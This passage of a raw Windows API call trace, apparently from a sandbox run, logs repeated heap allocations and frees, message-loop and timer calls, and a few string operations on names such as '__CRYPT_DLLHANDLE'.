| out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0141.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0141.418] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0141.418] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0141.418] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0141.418] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0141.418] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0141.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0141.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0141.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0141.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0141.419] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0141.419] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.419] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0141.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0141.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0141.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0141.420] CharLowerBuffW (in: lpsz="byte[99760]", cchLength=0xb | out: lpsz="byte[99760]") returned 0xb [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0141.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0141.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185b0) returned 0x2eb0ea0 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0141.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0141.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0141.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0141.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0141.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2ec9458 [0141.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2ee1a10 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec9458 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee1a10 | out: hHeap=0x970000) returned 1 [0141.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0141.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0141.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0141.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0141.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.434] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0141.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0141.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0141.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0141.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0141.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0141.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0141.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0141.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0141.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2ec9458 [0141.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec9458 | out: hHeap=0x970000) returned 1 [0141.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0141.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0141.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0141.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0141.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0141.443] RtlAllocateHeap 